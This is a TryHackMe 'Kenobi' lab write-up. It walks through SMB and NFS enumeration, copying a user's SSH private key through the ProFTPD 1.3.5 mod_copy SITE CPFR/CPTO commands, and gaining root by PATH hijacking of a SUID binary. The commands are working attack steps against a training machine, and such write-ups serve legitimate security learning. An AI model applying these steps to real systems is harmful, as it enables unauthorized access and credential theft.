
---
title: "TryHackMe - Kenobi Writeup"
summary: "Writeup of Kenobi room on TryHackMe"
categories: ["writeup"]
tags: ["tryhackme", "smb"]
showSummary: true
date: 2022-12-02
draft: false
---

Walkthrough on exploiting a Linux machine. Enumerate Samba for shares, manipulate a vulnerable version of proftpd and escalate your privileges with path variable manipulation. 

## Enumerating Samba for shares
Using nmap we can enumerate a machine for SMB shares:
```bash
sudo nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.128.132 -oN nmap/smb

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-enum-shares: 
|   account_used: guest
|   \\10.10.128.132\IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (kenobi server (Samba, Ubuntu))
|     Users: 1
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.128.132\anonymous: 
|     Type: STYPE_DISKTREE
|     Comment: 
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\home\kenobi\share
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.128.132\print$: 
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\var\lib\samba\printers
|     Anonymous access: <none>
|_    Current user access: <none>
|_smb-enum-users: ERROR: Script execution failed (use -d to debug)
```

On most distributions of Linux smbclient is already installed. Lets inspect one of the shares:
`smbclient //<ip>/anonymous`

```bash
smbclient //10.10.128.132/anonymous
	dir
	.                                   D        0  Wed Sep  4 03:49:09 2019
	..                                  D        0  Wed Sep  4 03:56:07 2019
	log.txt                             N    12237  Wed Sep  4 03:49:09 2019
	
	get log.txt

cat log.txt --> return SSH key
```

You can recursively download the SMB share too. Submit the username and password as nothing.
`smbget -R smb://<ip>/anonymous`

Enumerate nfs:
`nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.17.15`

```bash
nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.128.132

PORT    STATE SERVICE
111/tcp open  rpcbind
| nfs-ls: Volume /var
|   access: Read Lookup NoModify NoExtend NoDelete NoExecute
| PERMISSION  UID  GID  SIZE  TIME                 FILENAME
| rwxr-xr-x   0    0    4096  2019-09-04T08:53:24  .
| rwxr-xr-x   0    0    4096  2019-09-04T12:27:33  ..
| rwxr-xr-x   0    0    4096  2019-09-04T12:09:49  backups
| rwxr-xr-x   0    0    4096  2019-09-04T10:37:44  cache
| rwxrwxrwt   0    0    4096  2019-09-04T08:43:56  crash
| rwxrwsr-x   0    50   4096  2016-04-12T20:14:23  local
| rwxrwxrwx   0    0    9     2019-09-04T08:41:33  lock
| rwxrwxr-x   0    108  4096  2019-09-04T10:37:44  log
| rwxr-xr-x   0    0    4096  2019-01-29T23:27:41  snap
| rwxr-xr-x   0    0    4096  2019-09-04T08:53:24  www
|_
| nfs-showmount: 
|_  /var *
| nfs-statfs: 
|   Filesystem  1K-blocks  Used       Available  Use%  Maxfilesize  Maxlink
|_  /var        9204224.0  1836524.0  6877104.0  22%   16.0T        32000
```

## Gain initial access with ProFtpd 
The `mod_copy` module implements `SITE CPFR` and `SITE CPTO` commands, which can be used to copy files/directories from one place to another on the server. Any unauthenticated client can leverage these commands to copy files from any part of the filesystem to a chosen destination.

![41e9801292bd8db8eea7d7c778565a8b.png](./img/41e9801292bd8db8eea7d7c778565a8b.png)

```bash
nc -v 10.10.128.132 21
Connection to 10.10.128.132 21 port [tcp/ftp] succeeded!
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.128.132]
	SITE CPFR /home/kenobi/.ssh/id_rsa
	350 File or directory exists, ready for destination name
	SITE CPTO /var/tmp/id_rsa
	250 Copy successful
```

Once the SSH key has been copied to the mount share, we can mount it and have access to key:
```bash
mkdir /mnt/kenobiNFS
sudo mount 10.10.128.132:/var mnt/kenobiNFS/
cd mnt/kenobiNFS/tmp
```

Now we can log in the server using the SSH key.
```bash
sudo chmod 600 id_rsa
ssh kenobi@10.10.128.132 -i id_rsa
```

## Privesc
Checking for misconfigurations to privilege escalation we found the binary `/user/bin/menu` as SUID, what allows us to use it as root.

`find / -perm -u=s -type f 2>/dev/null`

![48bccc754d3a334f7bef6dbdd4199e66.png](./img/48bccc754d3a334f7bef6dbdd4199e66.png)
![210c56949b6dc25a08b68abd454dfccb.png](./img/210c56949b6dc25a08b68abd454dfccb.png)

`strings` is a command on Linux that looks for human readable strings on a binary.

This shows us the binary is running without a full path (e.g. not using `/usr/bin/curl` or `/usr/bin/uname`).

As this file runs as the root users privileges, we can manipulate our path gain a root shell.

![e695d76b6ef9f25dd650e40338426ca3.png](./img/e695d76b6ef9f25dd650e40338426ca3.png)

We copied the `/bin/sh` shell, called it curl, gave it the correct permissions and then put its location in our path. This meant that when the `/usr/bin/menu` binary was run, its using our path variable to find the "curl" binary.. Which is actually a version of `/usr/sh`, as well as this file being run as root it runs our shell as root!
